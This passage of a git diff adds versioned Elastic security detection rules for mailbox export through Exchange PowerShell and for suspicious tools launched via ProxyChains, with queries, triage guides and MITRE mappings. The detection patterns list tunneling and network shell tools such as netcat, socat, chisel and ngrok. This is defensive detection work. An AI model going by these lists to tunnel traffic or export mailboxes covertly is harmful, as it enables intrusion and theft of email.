Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and \n process.command_line : (\"*MailboxExportRequest*\", \"*-Mailbox*-ContentFilter*\")\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + }, + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "6aace640-e631-4870-ba8e-5fdda09325db_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_111.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_111.json new file mode 100644 index 00000000000..5f30fbc40d6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_111.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Exporting Exchange Mailbox via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Exporting Exchange Mailbox via PowerShell\n\nEmail mailboxes and their information can be valuable assets for attackers. Company mailboxes often contain sensitive information such as login credentials, intellectual property, financial data, and personal information, making them high-value targets for malicious actors.\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\n\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and \n process.command_line : (\"*MailboxExportRequest*\", \"*-Mailbox*-ContentFilter*\")\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + }, + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "6aace640-e631-4870-ba8e-5fdda09325db_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_5.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_5.json new file mode 100644 index 00000000000..f3b965e1f9a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_5.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Utility Launched via ProxyChains", + "note": "## Triage and analysis\n\n### Investigating Suspicious Utility Launched via ProxyChains\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for a list of suspicious processes spawned through `proxychains` by analyzing process command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\") and\nevent.type == \"start\" and process.name == \"proxychains\" and process.args : (\n \"ssh\", \"sshd\", \"sshuttle\", \"socat\", \"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\",\n \"ssf\", \"3proxy\", \"ngrok\", \"gost\", \"pivotnacci\", \"chisel*\", \"nmap\", \"ping\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\", \"ftp\", \"curl\", \"wget\"\n)\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_6.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_6.json new file mode 100644 index 00000000000..b94bc1c8ea4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_6.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Utility Launched via ProxyChains", + "note": "## Triage and analysis\n\n### Investigating Suspicious Utility Launched via ProxyChains\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for a list of suspicious processes spawned through `proxychains` by analyzing process command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"proxychains\" and process.args : (\n \"ssh\", \"sshd\", \"sshuttle\", \"socat\", \"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\",\n \"ssf\", \"3proxy\", \"ngrok\", \"gost\", \"pivotnacci\", \"chisel*\", \"nmap\", \"ping\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\", \"ftp\", \"curl\", \"wget\"\n)\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_7.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_7.json new file mode 100644 index 00000000000..88d5c389fcd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_7.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Utility Launched via ProxyChains", + "note": "## Triage and analysis\n\n### Investigating Suspicious Utility Launched via ProxyChains\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for a list of suspicious processes spawned through `proxychains` by analyzing process command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT 